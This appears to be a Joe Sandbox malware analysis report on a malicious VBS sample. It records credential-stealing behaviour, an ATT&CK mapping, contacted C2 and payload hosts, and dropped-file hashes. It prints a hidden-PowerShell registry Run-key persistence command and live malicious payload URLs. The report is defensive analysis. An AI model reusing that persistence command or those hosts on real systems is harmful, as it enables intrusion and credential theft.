Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_08985328 cpuid

9_2_08985328

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_083C54A4 CreateNamedPipeW,

3_2_083C54A4

Stealing of Sensitive Information:

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting221	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	OS Credential Dumping1	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter11	Registry Run Keys / Startup Folder21	Process Injection13	Scripting221	LSASS Memory	System Information Discovery25	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell3	Logon Script (Windows)	Registry Run Keys / Startup Folder21	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	Security Software Discovery321	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion241	Cached Domain Credentials	Virtualization/Sandbox Evasion241	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection13	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.bin	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.bins	0%	Avira URL Cloud	safe
http://103.167.84.150/	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.binO	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)	0%	Avira URL Cloud	safe
https://contoso.com/	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.binE	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.bind	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;	0%	Avira URL Cloud	safe
http://103.167.84.150/bconta/Host_DwUbTLydN243.bin	0%	Avira URL Cloud	safe
http://crl.micr	0%	Avira URL Cloud	safe
http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
septnet.duckdns.org	193.104.197.85	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.167.84.150/mconta/Host_DwUbTLydN243.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin	ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://103.167.84.150/mconta/Host_DwUbTLydN243.bins	ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	false		high
http://103.167.84.150/	ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://103.167.84.150/mconta/Host_DwUbTLydN243.binO	ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-	ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp	false		high
http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)	ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://103.167.84.150/mconta/Host_DwUbTLydN243.binE	ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://103.167.84.150/mconta/Host_DwUbTLydN243.bind	ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;	ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://103.167.84.150/bconta/Host_DwUbTLydN243.bin	ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micr	powershell.exe, 0000000E.00000002.16332582350.0000000000C38000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmp	false		high
https://aka.ms/pscore6lBpm	powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp	false		high
http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s	ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.167.84.150	unknown	unknown		7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
193.104.197.85	septnet.duckdns.org	unknown		1299	TELIANETTeliaCarrierEU	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528495
Start date:	25.11.2021
Start time:	11:23:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DETAILS.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winVBS@30/40@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 300 Number of non-executed functions: 16
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 20.82.207.122 Excluded domains from analysis (whitelisted): www.bing.com, wdcpalt.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, wdcp.microsoft.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:25:51	API Interceptor	169x Sleep call for process: powershell.exe modified
11:26:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Deathwe2 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
11:26:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Deathwe2 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
septnet.duckdns.org	nSHIPPING-ADVISE_SHIPMENT-INFORMATION_3814147541--Delivery_OCTOBER28-2021.vbs	Get hash	malicious	Browse	193.104.197.31
	DHL+Shipment+Notification_3814110941--Delivery_OCTOBER27-2021.exe	Get hash	malicious	Browse	193.104.197.43
	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	Get hash	malicious	Browse	193.104.197.90
	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELIANETTeliaCarrierEU	6L1AGNUMgk	Get hash	malicious	Browse	178.76.5.165
	mfFr814Hup	Get hash	malicious	Browse	178.76.5.184
	xE9RTUBg8V	Get hash	malicious	Browse	178.76.5.196
	arm	Get hash	malicious	Browse	178.76.5.179
	VUUGP65515	Get hash	malicious	Browse	209.170.88.180
	wAs4FSRG7s	Get hash	malicious	Browse	178.76.5.191
	d8Hs7X8HGP	Get hash	malicious	Browse	217.212.229.224
	uRQVqbl0sQ	Get hash	malicious	Browse	104.123.190.215
	RrK5IgZ6gZ	Get hash	malicious	Browse	213.155.129.253
	tDfXtXb4Oz	Get hash	malicious	Browse	178.76.5.130
	p9rySh9WA4	Get hash	malicious	Browse	178.72.31.135
	xd.x86	Get hash	malicious	Browse	209.95.144.130
	3Htna329pC	Get hash	malicious	Browse	80.239.196.165
	rArrival_Notice_213674204_ref_00D0Nk6PC_5005p2WPHZn_ref-213674204.vbs	Get hash	malicious	Browse	193.104.197.81
	nSHIPPING-ADVISE_SHIPMENT-INFORMATION_3814147541--Delivery_OCTOBER28-2021.vbs	Get hash	malicious	Browse	193.104.197.31
	DHL+Shipment+Notification_3814110941--Delivery_OCTOBER27-2021.exe	Get hash	malicious	Browse	193.104.197.43
	DHL_Shipment-Notification-2166598383-Notification-XXXXXMSG0073728273736_OCTOBER22-2021.exe	Get hash	malicious	Browse	193.104.197.94
	DPJPYxGxfI	Get hash	malicious	Browse	178.76.5.134
	Z1JWqe0tZn	Get hash	malicious	Browse	209.170.88.133
	DGTm0edISX	Get hash	malicious	Browse	213.248.71.55
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	20211125 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsx	Get hash	malicious	Browse	103.167.92.73
	meerkat.x86	Get hash	malicious	Browse	103.160.46.142
	oQANZnrt9d	Get hash	malicious	Browse	103.163.1.44
	y8CYO3E0MF	Get hash	malicious	Browse	130.222.22.174
	RFQ_PO-330758290144.xlsx	Get hash	malicious	Browse	103.167.92.57
	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	103.171.1.140
	NQsLN1nOON	Get hash	malicious	Browse	103.170.35.74
	ANT_0402205_001_144747_20211117.xlsx	Get hash	malicious	Browse	103.167.92.73
	IAENMAI.xlsx	Get hash	malicious	Browse	103.167.90.66
	IAENMAI.xlsx	Get hash	malicious	Browse	103.167.90.66
	psI4iJBgiA	Get hash	malicious	Browse	138.7.41.139
	sora.arm-20211123-2050	Get hash	malicious	Browse	103.181.193.3
	20212311.xlsx	Get hash	malicious	Browse	103.171.1.219
	justificantes anticipos.xlsx	Get hash	malicious	Browse	103.167.90.66
	20211118 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsx	Get hash	malicious	Browse	103.167.92.73
	0416ORTX20497421.xlsx	Get hash	malicious	Browse	103.171.1.140
	Purchase Order 367465636.xlsx	Get hash	malicious	Browse	103.167.92.57
	mips-20211123-0942	Get hash	malicious	Browse	103.172.251.7
	FICHERO 1.xlsx	Get hash	malicious	Browse	103.167.92.73
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.167.90.66

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.841989710132343
Encrypted:	false
SSDEEP:	192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
MD5:	677C4E3A07935751EA3B092A5E23232F
SHA1:	0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
SHA-256:	D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
SHA-512:	253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15924
Entropy (8bit):	5.580048003212767
Encrypted:	false
SSDEEP:	384:dugUWHIBDEJTJ7qCF+zqcFV3m3Yjf9inRmy9P7eMbMIcZhi:fSIJTJrcFV3Lf9Ji7z4dE
MD5:	E9D180387566A7C92C0BDEC6BEA1F9D7
SHA1:	8894659A987087AC1F82A1DE2ABB560A30C230F2
SHA-256:	93CBCE0A9C09040402D4869F9C99B93F23042FF2F5245CBB2D4287A814AC75A4
SHA-512:	9BCE1181120DD01DC7A63FF5CD6B777148D1D925B7D7AD651A107905342A14347A4324B3B068BF31695E766C4D9101DC62BA6C8281FFF76D9B8E8EF115FD1597
Malicious:	false
Preview:	@...e...........V.....................<.4............@..........H...............o..b~.D.poM...2..... .Microsoft.PowerShell.ConsoleHostD................g$H..K..I.............System.Management.Automation4...............-..Q...H..g............System.Core.0..................)W_tD...B..T.........System..4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@...............8Ak....G.......j........System.DirectoryServices<.................YS.eE..9.G...........System.Management...4...................2.8F.....S.".......System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1059000734993276
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuak7YnqqsPN5Dlq5J:+RI+ycuZhNQakSsPNnqX
MD5:	92113DEFF8010060EFCFCD627165FC3C
SHA1:	99A7AEBA0281A065FE3566293075E107BE686259
SHA-256:	5B2AF0F88656C15EC4806F94282B57EF392DC6279EC68C15FE132A51F8D083DC
SHA-512:	5B0DC9105913E4CEFD21B38C73E79D575510ECF5F34EA6B69C392A90A6CF322817BBC6CA58DF025D026CF64A8610F11E26DB09C56E021DA26F8D85CCBF3D2CA7
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.l.a.4.k.v.b.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.l.a.4.k.v.b.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.092304031247258
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydqak7YnqqmbPN5Dlq5J:+RI+ycuZhNHqakSmbPNnqX
MD5:	576649428FED419E0039705E8778C7D1
SHA1:	6789EDF06B9F97B5ABD64047DF8350D4FCED96D1
SHA-256:	3EADCEB6B1258CB8DBBCAB46496EC78E7C78C7BA8DBB29F1F710884FC9BF356D
SHA-512:	2D1CA4C9185E78D1F3F7DB915D15CADD67D07FF674E08ABA9F178BB8C15EA20B2D3718CC9B47B36439871178DDBE5EC29EA24A825D3EC30514773D8B587DA88E
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.o.t.c.k.r.0.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.o.t.c.k.r.0.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1158438080385094
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryR3xak7Ynqq632PN5Dlq5J:+RI+ycuZhN7BakS6mPNnqX
MD5:	260825ADB1CEEA1232E54FD137F1E6EF
SHA1:	5F7449FC3DBB41B5A445BF224F5683F7D50A4B9E
SHA-256:	D37186C9DF5281569FD30096388105EB522C1EAB9FE652942FA95279F7BC286E
SHA-512:	698910B47B5CEF69B8FA67F7419F98210FC9A3882F9257BDA8E2727774FA5E56AC4068976F4FE1892D1D39E3FBDBFB6E224F224BD5E1413BD8B390A81ED092BB
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.y.b.s.2.g.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.y.b.s.2.g.q.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\Depopulato2.dat Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	48258
Entropy (8bit):	6.8580638642234435
Encrypted:	false
SSDEEP:	768:UC5K/L9xmjBs6YEjfAX4IS75qElIA/IMigzaatw129/bI/38ylwL:USKD9xmjq6YafaSNTO2WEaa21SUhw
MD5:	65BDF68258059B5C43500D38DE5B1C59
SHA1:	55E6A04CADFABFD174EE57D16A5A4CA774A05505
SHA-256:	5F303FA60234AADB076730D999B8897247A0F62659147CE7B5030ECBEBDB7FE9
SHA-512:	1222847DB3471C945D9526572E741D49A976775192DE5F4D28577A663F2A2AA27399C50A1482D0875921416547A59CDB839B2B410AE9F750726911AB0033A812
Malicious:	false
